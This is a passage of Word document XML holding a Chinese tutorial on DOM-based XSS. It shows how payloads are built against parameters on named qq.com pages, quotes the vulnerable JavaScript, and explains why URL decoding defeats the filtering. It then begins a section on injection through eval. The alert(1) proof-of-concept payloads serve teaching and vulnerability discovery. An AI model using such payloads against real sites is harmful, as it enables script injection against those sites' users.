            <wp:docPr id="36" name="图片 36" descr="41.jpg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1.jpg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36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和查看源代码没有什么不同，只是这次是在调试工具里看而已。</w:t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6.通过上面的方式，确定【可能】有漏洞之后。我们可以有2个方式来进行下一步。</w:t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直接根据调试工具里看到的HTML代码情况，来构造利用代码。优点：省时间，缺点：如果对方有一定过滤，就很难构造</w:t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定位到与这个缺陷参数sid相关的JS代码，再来构造利用代码。优点：能利用一些复杂的情况，缺点：耗时间。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7.对于新手来说，先看6.1的情况。看到步骤5里面的那个图。我们可以构造以下代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352F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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objectwidth="100%"height="100%"id="f"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"&gt;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&lt;paramname="movie"value="aaaaaa"&gt;&lt;/object&gt;&lt;imgsrc="1"onerror="alert(1)"&gt;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ab/>
              <w:t>...其它的省略了...</w:t>
            </w:r>
          </w:p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/object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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对应的图片解析：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0FA51659" wp14:editId="4B56FAEB">
            <wp:extent cx="5715000" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="37" name="图片 37" descr="42.jpg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2.jpg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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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37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进而“试探性”的测试一下利用代码，因为我们不知道对方会不会过滤掉“双引号”，“括号”</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之类的，只能试试了。</w:t>
      </w:r>
      <w:r w:rsidR="00C352F0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/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352F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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qt.qq.com/video/play_video.htm?sid=aaaaaa"&gt;&lt;/object&gt;&lt;imgsrc="1"onerror="alert(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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没反应，我们继续看看调试工具，发现，双引号，变成了\\"。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62E4F81D" wp14:editId="050F5C36">
            <wp:extent cx="5715000" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="图片 38" descr="43.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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3.jpg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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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38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19368A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8.</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据这个情况，我们可以进一步修改代码。&lt;img&gt;标签里不使用双引号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52F0" w:rsidRPr="009C207F" w:rsidTr="00C352F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C352F0" w:rsidRPr="009C207F" w:rsidRDefault="00C352F0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qt.qq.com/video/play_video.htm?sid=aaaaaa"&gt;&lt;/object&gt;&lt;imgsrc=1onerror=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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次OK啦。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95137C5" wp14:editId="7BD54439">
            <wp:extent cx="5715000" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 39" descr="44.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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4.jpg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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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39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，这种方式，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>写利用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码很快。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C352F0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9.</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再来看看6.2的方法。既然我们知道了，sid这个参数会被使用。那么我们的目标是，javascript的代码里哪里使用了sid这个参数呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019368A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0</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.我们首先，F12打开调试工具，点【Resources】，再点Frames,然后Ctrl+F搜索"sid"或者'sid'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3FA73FBC" wp14:editId="0E44E0E6">
            <wp:extent cx="5715000" cy="2619375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="40" name="图片 40" descr="45.jpg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5.jpg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40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352F0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运气很好，一下就定位到了一个sid。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C352F0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</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.可以看到是getUrlPara("sid")，从单词，我们不难猜出，getUrlPara就是前面我们提到的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取地址栏参数“的函数。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为了进一步确定，我们可以很方便的在console里查看getUrlParam函数是啥样的。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0374839E" wp14:editId="27E9F062">
            <wp:extent cx="5715000" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="41" name="图片 41" descr="46.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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6.jpg">
                      <a:hlinkClick r:id="rId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41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26772" w:rsidRPr="009C207F" w:rsidRDefault="0019368A" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/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，实际上getUrlParam是对&lt;,&gt;做了过滤，但是由于chrome浏览器自身的XSS防御机制，导致location.href获取的location.href是已经经过编码的。从而导致未过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019368A" w:rsidRPr="009C207F" w:rsidRDefault="0019368A" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如下图：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54B7AAFA" wp14:editId="25272EAF">
            <wp:extent cx="5715000" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="42" name="图片 42" descr="48.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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8.jpg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42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19368A" w:rsidRPr="009C207F" w:rsidRDefault="00DA2931" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.按道理，location.href里的&lt;,&gt;,"已经变成了%3c,%3e,%22已经被过滤了，不会有XSS了，为什么还可以呢？我们进一步往后看。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6B36BEB2" wp14:editId="2E3EABAD">
            <wp:extent cx="5715000" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="图片 43" descr="47.jpg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7.jpg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4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26772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看来，关键就是这里，这里有一步decodeURIComponent的操作，会将%3c,%3e，又变回</w:t>
      </w:r>
      <w:r w:rsidR="00226772" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;,&gt;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供参考的完整的缺陷代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26772" w:rsidRPr="009C207F" w:rsidTr="00226772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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>varsid=getUrlPara("sid");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>if(!sid||sid==""){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 w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>document.getElementById("dv_video").innerHTML='&lt;divclass="errmsg"style="margin-top:-10px;"&gt;抱歉，视频不存在！&lt;/div&gt;';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>}else{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  <w:t>varflash_ver=GetSwfVer();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  <w:t>if(flash_ver==-1){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 w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>document.getElementById("dv_video").innerHTML='&lt;divclass="errmsg"style="margin-top:-30px;"&gt;抱歉，您还没有安装flash插件&lt;br/&gt;请&lt;atarget="_blank"href="http://www.macromedia.com/go/getflashplayer"&gt;下载&lt;/a&gt;10.0以上的flash播放器&lt;br/&gt;安装flash后，请&lt;ahref="javascript:location.reload();"&gt;点此刷新&lt;/a&gt;&lt;/div&gt;';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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}elseif</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(flash_ver.split('.')[0]&lt;10){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 w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>document.getElementById("dv_video").innerHTML='&lt;divclass="errmsg"style="margin-top:-30px;"&gt;抱歉，您的flash版本过低&lt;br/&gt;请&lt;atarget="_blank"href="http://www.macromedia.com/go/getflashplayer"&gt;下载&lt;/a&gt;10.0以上的flash播放器&lt;br/&gt;安装flash后，请&lt;ahref="javascript:location.reload();"&gt;点此刷新&lt;/a&gt;&lt;/div&gt;';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  <w:t>}else{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</w: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  <w:t>sid=decodeURIComponent(sid).trim().replace(/([\'\"])/g,'\\\\$1');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</w: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  <w:t>if(!is_valid_sid(sid)){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 w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>document.getElementById("dv_video").innerHTML='&lt;divclass="errmsg"style="margin-top:-10px;"&gt;无法打开视频文件，视频地址不合法！&lt;/div&gt;';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</w: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  <w:t>}else{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</w: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</w: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  <w:t>insertFlash("dv_video","f",sid,"100%","100%");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</w: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  <w:t>}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ab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00226772" w:rsidRPr="009C207F" w:rsidRDefault="00226772" w:rsidP="009C207F">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="240" w:line="375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C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00226772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1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.接着，会调用insertFlash("dv_video","f",sid,"100%","100%");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insertFlash里，也并没有对sid进行任何过滤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26772" w:rsidRPr="009C207F" w:rsidTr="00226772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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functioninsertFlash(elm,eleid,url,w,h){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if(!document.getElementById(elm))return;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varstr='';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str+='&lt;objectwidth="'+w+'"height="'+h+'"id="'+eleid+'"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"&gt;';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str+='&lt;paramname="movie"value="'+url+'"/&gt;';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str+='&lt;paramname="allowScriptAccess"value="never"/&gt;';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str+='&lt;paramname="allowFullscreen"value="true"/&gt;';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str+='&lt;paramname="wmode"value="transparent"/&gt;';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str+='&lt;paramname="quality"value="autohigh"/&gt;';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str+='&lt;embedwidth="'+w+'"height="'+h+'"name="'+eleid+'"src="'+url+'"quality="autohigh"swLiveConnect="always"wmode="transparent"allowScriptAccess="never"allowFullscreen="true"type="application/x-shockwave-flash"pluginspage="http://www.macromedia.com/go/getflashplayer"&gt;&lt;/embed&gt;';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lastRenderedPageBreak/>
              <w:t>str+='&lt;/object&gt;';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document.getElementById(elm).innerHTML=str</w:t>
            </w:r>
          </w:p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图片解析：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354CCCD0" wp14:editId="5E5A0D8B">
            <wp:extent cx="5715000" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="44" name="图片 44" descr="49.jpg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9.jpg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44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19368A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</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0019368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.根据以上分析，我们的利用代码可以写为。注意，%3E,%3C的编码是关键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26772" w:rsidRPr="009C207F" w:rsidTr="00226772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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qt.qq.com/video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00226772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非常值得说明的是：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果采用6.1的方法，我们得到的利用代码是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26772" w:rsidRPr="009C207F" w:rsidTr="00226772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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qt.qq.com/video/play_video.htm?sid=aaaaaa"&gt;&lt;/object&gt;&lt;imgsrc=1onerror=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00226772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个代码在IE下，是没法XSS</w:t>
      </w:r>
      <w:r w:rsidR="00226772" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的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而通过6.2的方法，去分析JS代码，我们则可以构造出通用的XSS代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26772" w:rsidRPr="009C207F" w:rsidTr="00226772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00226772" w:rsidRPr="009C207F" w:rsidRDefault="0022677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qt.qq.com/video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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也反应了6.1和6.2方法各自的优缺点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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19368A" w:rsidRPr="009C207F" w:rsidRDefault="0019368A" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DomXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邂逅</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eval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19368A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前面的教程，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说到了显式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输出和隐式输出。但是不论怎么样，因为最终javascript都会通过document.write或innerHTML将内容输出到网页中，所以我们总是有办法看到输出到哪里。但是有时候，我们的输出，最终并没有流向innerHTML或document.write，而是与eval发生了邂逅，我们该怎么挖掘并利用呢？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19368A" w:rsidRPr="009C207F" w:rsidRDefault="00DA293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19368A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们直接上例子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52E6A" w:rsidRPr="009C207F" w:rsidTr="00C52E6A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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kf.qq.com/search_app.shtml?key=aaaaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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和前面的不同之处，这次我们搜索源代码和调试工具都看不到任何东西。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FC6805D" wp14:editId="3D3734B8">
            <wp:extent cx="5715000" cy="4410075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="45" name="图片 45" descr="50.jpg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0.jpg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45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52E6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2.这个时候，我们可以看看Console，看看有没有其它有用的东西～～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6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一般来说，默认情况下，是不会有问题的。我们可以给参数加一些特殊符号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6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里我比较习惯用\，因为这玩意比较好使。当然你也可以用其它比较特殊的符号，比如双引号，单引号，只是被过滤掉的几率比较大。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个时候，我们看看Console里面，多出了一条错误。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9EE54E2" wp14:editId="173B1402">
            <wp:extent cx="5715000" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="46" name="图片 46" descr="51.jpg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1.jpg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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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46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可以点右侧，直接定位到错误代码。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507B4327" wp14:editId="23CC1260">
            <wp:extent cx="5715000" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="47" name="图片 47" descr="52.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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2.jpg">
                      <a:hlinkClick r:id="rId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47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3.点进去后，可以看到是哪个地方出错了。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66E9B33B" wp14:editId="2E8DCDC7">
            <wp:extent cx="5715000" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="48" name="图片 48" descr="53.jpg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3.jpg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48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我们来看看这段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2E6A" w:rsidRPr="009C207F" w:rsidTr="00C52E6A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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vargetarg=function()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{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varurl=window.location.href;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</w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>varallargs=</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>url.split("?")[1];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if(allargs!=null&amp;&amp;allargs.indexOf("=")&gt;0)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/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>varargs=allargs.split("&amp;");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/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>for(vari=0;i&lt;args.length;i++)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/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>vararg=args[i].split("=");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/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>eval(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'this.'+arg[0]+'="'+arg[1]+'";');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/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>}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}</w:t>
            </w:r>
          </w:p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};</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C52E6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和上一节教程类似，这段代码，实际上也是一个获取地址栏参数的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6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比如，地址栏是key=aaaa;那么arg[0]就是字符串'key',arg[1]就是字符串</w:t>
      </w:r>
      <w:r w:rsidR="00C52E6A" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'aaaa';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么eval这句就是执行的eval('this.key="aaaa";')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11C21FD" wp14:editId="7F50A074">
            <wp:extent cx="5715000" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="49" name="图片 49" descr="54.jpg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4.jpg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49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52E6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样一来,this.key="aaaa";这句就被执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6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如果这里我们把key换个写法呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6A" w:rsidRPr="009C207F" w:rsidRDefault="00C52E6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this.key="aaaa";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6A" w:rsidRPr="009C207F" w:rsidRDefault="00C52E6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this.key</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
